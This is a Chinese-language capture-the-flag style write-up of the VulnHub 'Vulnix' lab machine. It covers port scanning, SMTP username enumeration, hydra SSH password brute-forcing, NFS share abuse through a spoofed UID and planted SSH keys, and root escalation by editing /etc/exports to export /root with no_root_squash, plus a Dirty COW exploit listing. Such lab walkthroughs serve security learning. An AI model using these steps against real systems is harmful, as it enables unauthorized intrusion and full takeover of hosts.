0x01 偵查

找尋靶機IP

└─$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:55 CST
Nmap scan report for 192.168.44.129
Host is up (0.00088s latency).
Nmap scan report for 192.168.44.230
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 75.43 seconds

偵查靶機開的port

└─$ sudo nmap -sS -sV -T4 -A -p- 192.168.44.230
[sudo] password for nathan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:58 CST
Nmap scan report for 192.168.44.230
Host is up (0.00073s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after:  2022-08-31T17:40:12
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
79/tcp    open  finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_pop3-capabilities: STLS CAPA SASL UIDL TOP RESP-CODES PIPELINING
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      39367/tcp6  mountd
|   100005  1,2,3      50406/tcp   mountd
|   100005  1,2,3      52541/udp   mountd
|   100005  1,2,3      52651/udp6  mountd
|   100021  1,3,4      41141/tcp   nlockmgr
|   100021  1,3,4      45141/udp6  nlockmgr
|   100021  1,3,4      50156/udp   nlockmgr
|   100021  1,3,4      53587/tcp6  nlockmgr
|   100024  1          46920/tcp   status
|   100024  1          51756/tcp6  status
|   100024  1          52813/udp   status
|   100024  1          53709/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS more have ID LITERAL+ listed capabilities Pre-login IDLE post-login SASL-IR LOGINDISABLEDA0001 OK STARTTLS IMAP4rev1 ENABLE
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_imap-capabilities: LOGIN-REFERRALS more ID have Pre-login listed SASL-IR IDLE post-login AUTH=PLAINA0001 capabilities OK ENABLE IMAP4rev1 LITERAL+
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
995/tcp   open  ssl/pop3s?
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_pop3-capabilities: CAPA SASL(PLAIN) TOP UIDL USER RESP-CODES PIPELINING
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
40909/tcp open  mountd     1-3 (RPC #100005)
41141/tcp open  nlockmgr   1-4 (RPC #100021)
42577/tcp open  mountd     1-3 (RPC #100005)
46920/tcp open  status     1 (RPC #100024)
50406/tcp open  mountd     1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/19%OT=22%CT=1%CU=35710%PV=Y%DS=2%DC=T%G=Y%TM=637839
OS:14%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW3%O2=M5B4ST11NW3%O3=M5B4NNT11NW3%O4=M5B4ST11NW3%O5=M5B4ST
OS:11NW3%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6979%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)

Network Distance: 2 hops
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s

TRACEROUTE (using port 3306/tcp)
HOP RTT     ADDRESS
1   0.20 ms DESKTOP-NRNV04H.mshome.net (172.23.32.1)
2   0.81 ms 192.168.44.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.88 seconds
Segmentation fault

0x02 Get Shell

這一次沒有80 port,不過有開25 port,SMTP(Simple Mail Transfer Protocol)。可以透過枚舉工具來情蒐,得到帳號:

  • VRFY 用以確認使用者名稱
  • EXPN 電子郵件列表
  • RCPT TO 收件者

不過枚舉工具smtp-user-enum好像沒有預先安裝,所以先安裝一下:

└─$ pip install smtp-user-enum
Defaulting to user installation because normal site-packages is not writeable
Collecting smtp-user-enum
  Downloading smtp_user_enum-0.5.0-py2.py3-none-any.whl (12 kB)
Collecting argparse
  Downloading argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Installing collected packages: argparse, smtp-user-enum
Successfully installed argparse-1.4.0 smtp-user-enum-0.5.0
  • -M 用户名猜测EXPN、VRFY或RCPT的方法(默认为VRFY)
  • -U 通过smtp服务检查的用户名文件
  • -t 服务器运行smtp服务的主机

-U後面要接字典檔:

└─$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/namelist.txt -t 192.168.44.230
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/namelist.txt
Target count ............. 1
Username count ........... 1909
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Sat Nov 19 10:46:18 2022 #########
192.168.44.230: backup exists
192.168.44.230: games exists
192.168.44.230: irc exists
192.168.44.230: mail exists
192.168.44.230: news exists
192.168.44.230: proxy exists
192.168.44.230: root exists
192.168.44.230: syslog exists
192.168.44.230: user exists
######## Scan completed at Sat Nov 19 10:46:25 2022 #########
9 results.

1909 queries in 7 seconds (272.7 queries / sec)

目前得到的帳號有backup、games、irc、mail、news、proxy、root、syslog、user等。要如何拿到密碼?

首先用finger來查登入資訊(這步是否必要?)。finger用于查找并显示用户信息,包括本地与远端主机的用户皆可,帐号名称没有大小写的差别。单独执行finger指令,它会显示本地主机现在所有的用户的登陆信息,包括帐号名称,真实姓名,登入终端机,闲置时间,登入时间以及地址和电话。

└─$ finger user@192.168.44.230
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

接下來使用hydra作ssh密碼爆破。有別於先前體驗過的其他工具,雖然也是透過字典檔的形式,但它支援多種不同協定,可以用來破解sshtelnetftp等等,使用範例如下

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

範例裡用到的相關參數如下:

 -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

通常是用-L給定Login name的列表(txt檔),然後搭配密碼字典檔來使用,不過現在只先對user做密碼爆破,所以直接打使用者名稱即可。用-t對靶機一次建立n個連線,來測試hydra能不能找到帳密來登入ssh服務。

└─$ hydra -l user -P /usr/share/wordlists/rockyou.txt -t 6 ssh://192.168.44.230
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-19 13:57:54
[DATA] max 6 tasks per 1 server, overall 6 tasks, 14344399 login tries (l:1/p:14344399), ~2390734 tries per task
[DATA] attacking ssh://192.168.44.230:22/
[STATUS] 66.00 tries/min, 66 tries in 00:01h, 14344333 to do in 3622:19h, 6 active
[STATUS] 51.00 tries/min, 153 tries in 00:03h, 14344246 to do in 4687:40h, 6 active
[STATUS] 43.71 tries/min, 306 tries in 00:07h, 14344093 to do in 5468:53h, 6 active
[22][ssh] host: 192.168.44.230   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-19 14:09:56

這裡選的字典檔是/usr/share/wordlists/rockyou.txt,也可以選/usr/share/wordlists/metasploit/password.lst,但是破解時間太長了。

來ssh登入:

└─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Nov 19 06:18:19 GMT 2022

  System load:  0.02             Processes:           90
  Usage of /:   90.4% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.4% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

user@vulnix:~$

接下來翻翻看有沒有什麼值得提權的。

來看看nfs

└─$ showmount -e 192.168.44.230
Export list for 192.168.44.230:
/home/vulnix *

這代表靶机将vulnix用户的家目录共享,所以我們掛載。

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali: 

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/home/vulnix /mnt/nfs

┌──(kali㉿kali)-[~]
└─$ cd /mnt                                         

┌──(kali㉿kali)-[/mnt]
└─$ cd nfs 
cd: permission denied: nfs


┌──(kali㉿kali)-[/mnt]
└─$ ls -al
total 12
drwxr-xr-x  3 root   root    4096 Nov 19 03:20 .
drwxr-xr-x 18 root   root    4096 Aug  8 06:57 ..
drwxr-x---  2 nobody nogroup 4096 Sep  2  2012 nfs

要注意,上面的指令只能在虛擬機有用,在wsl2沒有用。可以發現雖然掛載了,但進不去,估计设置了root_squash。

  • no_root_squash:登入 NFS 主机使用分享目录的使用者,如果是 root 的话,那么对于这个分享的目录来说,他就具有 root 的权限。
  • root_squash:在登入 NFS 主机使用分享目录的使用者如果是 root 时,那么这个使用者的权限将被压缩成为匿名使用者,通常他的 UID 与 GID 都会变成 nobody 那个系统账号的身份。

現在可能沒辦法把root_squash改成no_root_squash,但既然掛載的是vulnix的家目錄,那麼在攻擊機創建一個使用者名稱、uid、gid一樣的使用者,再用這使用者的身分登入就好。

那我們要查vulnix的uid跟gid是多少,首先要先用剛剛得到的user帳密ssh登入,再看看/etc/passwd

─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Nov 19 16:40:53 GMT 2022

  System load:  0.0              Processes:           89
  Usage of /:   84.7% of 773MB   Users logged in:     0
  Memory usage: 9%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sat Nov 19 06:18:19 2022 from 192.168.44.1
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false

查到uid跟gid都是2008,接下來在攻擊機上創建一樣的帳號:

┌──(kali㉿kali)-[/mnt]
└─$ sudo groupadd -g 2008 vulnix                          
[sudo] password for kali: 

┌──(kali㉿kali)-[/mnt]
└─$ sudo adduser vulnix -uid=2008 -gid=2008
Adding user `vulnix' ...
Adding new user `vulnix' (2008) with group `vulnix' ...
Creating home directory `/home/vulnix' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
No password has been supplied.
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for vulnix
Enter the new value, or press ENTER for the default
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        me Phone []: 
        Other []: 
Is the information correct? [Y/n] Y

接下來把帳號切換到vulnix,移動到nfs目錄,再查看裡面有什麼檔案:

┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix                            
Password: 
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt/nfs                                                              

┌──(vulnix㉿kali)-[/mnt/nfs]
└─$ ls -la                                                                   
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep  2  2012 .
drwxr-xr-x 3 root   root   4096 Nov 19 03:20 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile

進入後只有一些普通的共通文件,這裡一個神奇操作來了: 在nfs內創建ssh密鑰,這樣就可以從我們創建的假帳號,變成靶機內的vulnix真帳號!

┌──(kali㉿kali)-[/mnt]
└─$ sudo passwd root
[sudo] password for kali: 
New password: 
Retype new password: 
passwd: password updated successfully

┌──(kali㉿kali)-[/mnt]
└─$ su              
Password: 
┌──(root㉿kali)-[/mnt]
└─# cd

┌──(root㉿kali)-[~]
└─# pwd 
/root                                                                            

┌──(root㉿kali)-[~]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:XYggyHFUzP276r4usW0H63whDKf4ZJVMWuv1BqTLkJI root@kali
The key's randomart image is:
+---[RSA 3072]----+
| ..+++o.         |
|  o. .o.+...     |
|     . *.*. .    |
|    E = B.+.     |
|     o XSo.+     |
|    . = B o o    |
|     + + + +     |
|      +.+ +      |
|       BO=       |
+----[SHA256]-----+


┌──(root㉿kali)-[~]
└─# pwd
/root

┌──(root㉿kali)-[~]
└─# cd /root/.ssh

┌──(root㉿kali)-[~/.ssh]
└─# ls
id_rsa  id_rsa.pub                                                                                                                                                         

┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt

┌──(root㉿kali)-[~/.ssh]
└─# exit

┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix
Password: 
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt                                                                  

┌──(vulnix㉿kali)-[/mnt]
└─$ ls                                                                       
id_rsa.pub  nfs

┌──(vulnix㉿kali)-[/mnt]
└─$ mkdir /mnt/nfs/.ssh
mkdir: cannot create directory ‘/mnt/nfs/.ssh’: File exists


┌──(vulnix㉿kali)-[/mnt]
└─$ cd nfs/.ssh

┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ cp /mnt/id_rsa.pub authorized_keys                                       

┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ ls                                                                       
authorized_keys

先創建root帳號的密碼,登入root後下ssh-keygen指令,生成密鑰id_rsa.pub。比較要注意的是,要把生成的密鑰先用root權限移到vulnix權限也能存取的地方,再由vulnix移到nfs底下的.ssh。

接下來就是登入:

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa  vulnix@192.168.44.230
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 20 10:00:26 GMT 2022

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$

要特別注意的,就是ssh時的這個參數:

-o 'PubkeyAcceptedKeyTypes +ssh-rsa'

沒有這個參數,根本就無法無密碼登入。However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm.

0x03 提權

vulnix@vulnix:~$ sudo -ll
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:

Sudoers entry:
    RunAsUsers: root
    Commands:
        sudoedit /etc/exports
    RunAsUsers: root
    Commands:
        NOPASSWD: sudoedit /etc/export

可以從sudo -ll知道可以不須帳密就可編輯export文件

vulnix@vulnix:~$ sudoedit /etc/exports

原本文件只有/home/vulnix,直接多加root作為可共享目錄

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,no_root_squash)
/root           *(rw,no_root_squash)

接下來重開靶機後,再次看共用目錄,可以發現有共享root

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.44.230                           
Export list for 192.168.44.230:
/root        *
/home/vulnix *

所以創建一個目錄,把root掛載在上面:

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot                              

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/root /mnt/vulnroot

掛載以後就可以故技重施,製作ssh的公鑰私鑰:

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t ssh-rsa
Generating public/private ssh-rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): root_key
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in root_key
Your public key has been saved in root_key.pub
The key fingerprint is:
SHA256:WYQn4+8RkXF9595AiJu2c/0oRvda8tA+YrSnxvHKZAo kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|         .o+.o   |
|        +.=.. o o|
|       . +.+ . o.|
|        .o=   . .|
|        So o . o.|
|          = ooo.o|
|         E =o+*+o|
|          o B*.Xo|
|           oo=*.+|
+----[SHA256]-----+

創建.ssh資料夾,把公鑰放在裡面,並改名authorized_keys

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot/.ssh

┌──(kali㉿kali)-[~]
└─$ sudo cp .ssh/root_key.pub /mnt/vulnroot/.ssh/authorized_keys

接下來就可以不用帳密登入root帳號,完成提權。

┌──(kali㉿kali)-[~]
└─$ cd .ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ls -al
total 32
drwx------  2 kali kali 4096 Nov 20 05:40 .
drwxr-xr-x 22 kali kali 4096 Nov 20 05:59 ..
-rw-------  1 kali kali 2590 Nov 20 03:13 id_rsa
-rw-r--r--  1 kali kali  222 Nov 19 20:33 known_hosts
-rw-------  1 kali kali 2590 Nov 20 05:40 root_key
-rw-r--r--  1 kali kali  563 Nov 20 05:40 root_key.pub
-rw-------  1 kali kali 2590 Nov 20 04:55 y
-rw-r--r--  1 kali kali  563 Nov 20 04:55 y.pub

┌──(kali㉿kali)-[~/.ssh]
└─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i root_key root@192.168.44.230
[sudo] password for kali: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 20 11:02:05 GMT 2022

  System load:  0.02             Processes:           93
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Nov 20 10:43:21 2022 from 192.168.44.129
root@vulnix:~# ls -al
total 32
drwx------  4 root root 4096 Nov 20 10:36 .
drwxr-xr-x 22 root root 4096 Sep  2  2012 ..
-rw-------  1 root root    0 Sep  2  2012 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep  2  2012 .cache
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwxr-xr-x  2 root root 4096 Nov 20 10:42 .ssh
-r--------  1 root root   33 Sep  2  2012 trophy.txt
-rw-------  1 root root  710 Sep  2  2012 .viminfo
root@vulnix:~# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

0x03' 提權(2)

有一個叫dirty cow的弱點應該可以用:

└─$ searchsploit 3.9
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
...一大堆
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service             | linux/dos/19818.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privi | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escal | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access  | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Es | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access M | linux/local/40611.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution                         | linux/local/20402.sh
...一大堆
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Reference

Vulnhub-靶机-HACKLAB: VULNIX

VulnHub-HACKLAB: VULNIX-靶机渗透学习

Vulnix Walkthrough (OSCP Prep)

VulnHub: Vulnix

GitHub - vshaliii/Hacklab-Vulnix: CTF machine Writeup

Day 23 Password Attacks - 密碼攻擊 (hydra, pw-inspector) - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天

【Day11】列舉技術的實作 ─ 另外那篇 - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天


#attack #Vulnhub #nano #port 25 smtp枚舉 #查ssh登入資訊finger #ssh、telnet、ftp密碼爆破hydra #nfs共享目錄入侵 #ssh-keygen免帳密登入真帳號 #ssh使用私鑰登入 #linux kernel 2.6.22 < 3.9 #linux kernel < 4.13.9 (ubumtu 16.04/fedora 27) #Dirty COW







Related Posts

【Day02】The Shell(中)

【Day02】The Shell(中)

補充教學-亂數

補充教學-亂數

OAuth2.0 三部曲(3) - OPENID CONNECT(OIDC) 身分認證機制

OAuth2.0 三部曲(3) - OPENID CONNECT(OIDC) 身分認證機制


Comments